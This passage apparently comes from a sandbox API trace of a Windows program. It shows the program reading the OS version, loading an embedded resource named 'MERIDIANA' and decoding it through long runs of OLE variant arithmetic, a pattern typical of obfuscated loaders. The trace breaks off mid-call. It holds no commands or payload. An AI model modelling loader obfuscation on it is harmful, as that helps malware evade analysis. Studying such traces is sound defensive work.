0x1d2d8 [0066.598] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.598] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.598] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.598] CoFreeUnusedLibraries () [0066.598] GetTickCount () returned 0x1d2d8 [0066.598] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.598] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.598] GetTickCount () returned 0x1d2d8 [0066.599] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.599] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.599] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.599] CoFreeUnusedLibraries () [0066.599] GetTickCount () returned 0x1d2d8 [0066.599] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.599] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.599] GetTickCount () returned 0x1d2d8 [0066.609] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.609] GetLastError () returned 0x0 [0067.876] GetVersionExA (in: lpVersionInformation=0x18fb20*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x116019b, dwMinorVersion=0x18fa70, dwBuildNumber=0x18fc04, dwPlatformId=0x18fcf8, szCSDVersion="\xcd\x1e\x1a\x77\x91\x58\x37") | out: lpVersionInformation=0x18fb20*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0067.876] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0067.876] GetCurrentThreadId () returned 0xa48 [0067.876] GetCurrentThreadId () returned 0xa48 [0067.876] GetCurrentThreadId () returned 0xa48 [0067.877] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0067.877] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0xc, wParam=0x0, lParam=0x2635620) returned 0x1 [0067.877] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x1) returned 0x2636330 [0067.877] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635638 [0067.877] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635650 [0067.884] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x15) returned 0x2632128 [0067.889] SysStringLen (param_1="MERIDIANA") returned 0x9 [0067.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MERIDIANA", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0067.889] SysStringLen (param_1="MERIDIANA") returned 0x9 [0067.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MERIDIANA", cchWideChar=10, lpMultiByteStr=0x57cc3c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MERIDIANA", lpUsedDefaultChar=0x0) returned 10 [0067.889] SysStringLen (param_1="MPUT2") returned 0x5 [0067.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MPUT2", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.889] SysStringLen (param_1="MPUT2") returned 0x5 [0067.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MPUT2", cchWideChar=6, lpMultiByteStr=0x57cc54, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MPUT2", lpUsedDefaultChar=0x0) returned 6 [0067.889] SetErrorMode (uMode=0x8001) returned 0x8001 [0067.889] LoadLibraryA (lpLibFileName="c:\\windows\\system32\\kernel32") returned 0x76c20000 [0067.890] SetErrorMode (uMode=0x8001) returned 0x8001 [0067.890] GetProcAddress (hModule=0x76c20000, lpProcName="FindResourceA") returned 0x76c4e9bb [0067.890] FindResourceA (hModule=0x400000, lpName="MPUT2", lpType="MERIDIANA") returned 0x0 [0067.890] GetLastError () returned 0x716 [0067.894] SleepEx (dwMilliseconds=0x3e8, bAlertable=0) returned 0x0 [0068.903] GetLastError () returned 0x0 [0068.903] SafeArrayAllocDescriptorEx (in: vt=0x6, cDims=0x1, ppsaOut=0x408030 | out: ppsaOut=0x408030) returned 0x0 [0069.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MERIDIANA", cchWideChar=-1, lpMultiByteStr=0x18fc1c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MERIDIANA", lpUsedDefaultChar=0x0) returned 10 [0069.128] GetUserDefaultLCID () returned 0x409 [0069.128] FindResourceExA (hModule=0x400000, lpType="MERIDIANA", lpName=0x408, wLanguage=0x409) returned 0x409240 [0069.128] LoadResource (hModule=0x400000, hResInfo=0x409240) returned 0x409338 [0069.128] SizeofResource (hModule=0x400000, hResInfo=0x409240) returned 0x5f5d [0069.128] LockResource (hResData=0x409338) returned 0x409338 [0069.129] SafeArrayAccessData (in: psa=0x57dc40, ppvData=0x18fc44 | out: ppvData=0x18fc44) returned 0x0 [0069.129] SafeArrayUnaccessData (psa=0x57dc40) returned 0x0 [0069.129] SafeArrayCopy (in: psa=0x57dc40, ppsaOut=0x18fccc | out: ppsaOut=0x18fccc) returned 0x0 [0069.129] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x18fc3c | out: ppsaOut=0x18fc3c) returned 0x0 [0069.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18fa80, cbMultiByte=1, lpWideCharStr=0x57cc3c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0069.130] GetUserDefaultLCID () returned 0x409 [0069.131] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18fa74 | out: plOut=0x18fa74) returned 0x0 [0069.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18fa80, cbMultiByte=1, lpWideCharStr=0x57cc3c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0069.131] GetUserDefaultLCID () returned 0x409 [0069.132] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18fa74 | out: plOut=0x18fa74) returned 0x0 [0069.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f944, cbMultiByte=1, lpWideCharStr=0x57cc6c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0069.133] GetUserDefaultLCID () returned 0x409 [0069.133] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f9a8, cbMultiByte=1, lpWideCharStr=0x5799dc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0069.134] GetUserDefaultLCID () returned 0x409 [0069.134] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f980, cbMultiByte=1, lpWideCharStr=0x5799b4, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0069.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f9a8, cbMultiByte=1, lpWideCharStr=0x57cc6c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0069.134] GetUserDefaultLCID () returned 0x409 [0069.134] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.135] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f944, cbMultiByte=1, lpWideCharStr=0x57cc6c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0069.137] GetUserDefaultLCID () returned 0x409 [0069.137] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f9a8, cbMultiByte=1, lpWideCharStr=0x579964, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0069.138] GetUserDefaultLCID () returned 0x409 [0069.138] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f980, cbMultiByte=1, lpWideCharStr=0x57dc74, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0069.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f9a8, cbMultiByte=1, lpWideCharStr=0x57cc6c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0069.138] GetUserDefaultLCID () returned 0x409 [0069.138] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.138] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f944, cbMultiByte=1, lpWideCharStr=0x57cc6c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0069.140] GetUserDefaultLCID () returned 0x409 [0069.140] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f9a8, cbMultiByte=1, lpWideCharStr=0x5799dc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0069.140] GetUserDefaultLCID () returned 0x409 [0069.140] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f980, cbMultiByte=1, lpWideCharStr=0x57998c, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0069.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f9a8, cbMultiByte=1, lpWideCharStr=0x57cc6c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0069.141] GetUserDefaultLCID () returned 0x409 [0069.141] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.141] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f944, cbMultiByte=1, lpWideCharStr=0x57cc6c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0069.142] GetUserDefaultLCID () returned 0x409 [0069.142] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f9a8, cbMultiByte=1, lpWideCharStr=0x579964, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0069.143] GetUserDefaultLCID () returned 0x409 [0069.143] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f980, cbMultiByte=1, lpWideCharStr=0x57993c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0069.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f9a8, cbMultiByte=1, lpWideCharStr=0x57cc6c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0069.143] GetUserDefaultLCID () returned 0x409 [0069.143] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.144] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.144] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.145] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.145] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.311] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.311] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.311] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f9e4, cbMultiByte=1, lpWideCharStr=0x57cc6c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0069.367] GetUserDefaultLCID () returned 0x409 [0069.367] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.368] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.368] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.368] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.368] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.368] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.368] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f9e4, cbMultiByte=1, lpWideCharStr=0x57dc4c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0069.368] GetUserDefaultLCID () returned 0x409 [0069.368] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.369] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.369] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.369] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f9e4, cbMultiByte=1, lpWideCharStr=0x57cc6c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0069.369] GetUserDefaultLCID () returned 0x409 [0069.369] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f944, cbMultiByte=1, lpWideCharStr=0x57cc6c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0069.371] GetUserDefaultLCID () returned 0x409 [0069.371] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f9a8, cbMultiByte=1, lpWideCharStr=0x57dc4c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0069.372] GetUserDefaultLCID () returned 0x409 [0069.372] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f980, cbMultiByte=1, lpWideCharStr=0x579964, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0069.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f9a8, cbMultiByte=1, lpWideCharStr=0x57cc6c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0069.373] GetUserDefaultLCID () returned 0x409 [0069.373] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.373] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f944, cbMultiByte=1, lpWideCharStr=0x57cc6c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0069.374] GetUserDefaultLCID () returned 0x409 [0069.374] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f9a8, cbMultiByte=1, lpWideCharStr=0x57989c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0069.375] GetUserDefaultLCID () returned 0x409 [0069.375] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f980, cbMultiByte=1, lpWideCharStr=0x57dc74, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0069.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f9a8, cbMultiByte=1, lpWideCharStr=0x57cc6c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0069.375] GetUserDefaultLCID () returned 0x409 [0069.375] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.375] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.376] GetUserDefaultLCID () returned 0x409 [0069.376] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.377] GetUserDefaultLCID () returned 0x409 [0069.377] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.377] GetUserDefaultLCID () returned 0x409 [0069.377] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.377] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.377] GetUserDefaultLCID () returned 0x409 [0069.377] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.377] GetUserDefaultLCID () returned 0x409 [0069.377] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.377] GetUserDefaultLCID () returned 0x409 [0069.377] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.377] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.377] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.377] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.377] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.377] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.377] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.377] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.377] GetUserDefaultLCID () returned 0x409 [0069.378] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.378] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.378] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.378] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.378] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.378] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.378] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.378] GetUserDefaultLCID () returned 0x409 [0069.378] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.378] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.378] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.378] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.378] GetUserDefaultLCID () returned 0x409 [0069.378] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.378] GetUserDefaultLCID () returned 0x409 [0069.378] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.378] GetUserDefaultLCID () returned 0x409 [0069.378] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.378] GetUserDefaultLCID () returned 0x409 [0069.378] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.378] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.378] GetUserDefaultLCID () returned 0x409 [0069.379] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.379] GetUserDefaultLCID () returned 0x409 [0069.379] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.379] GetUserDefaultLCID () returned 0x409 [0069.379] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.379] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.379] GetUserDefaultLCID () returned 0x409 [0069.379] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.379] GetUserDefaultLCID () returned 0x409 [0069.379] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.379] GetUserDefaultLCID () returned 0x409 [0069.379] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.379] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.379] GetUserDefaultLCID () returned 0x409 [0069.379] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.379] GetUserDefaultLCID () returned 0x409 [0069.379] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.379] GetUserDefaultLCID () returned 0x409 [0069.379] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.379] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.379] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.380] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.380] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.380] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.380] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.380] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.380] GetUserDefaultLCID () returned 0x409 [0069.380] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.380] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.381] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.381] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.381] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.381] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.382] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.382] GetUserDefaultLCID () returned 0x409 [0069.382] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.382] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, 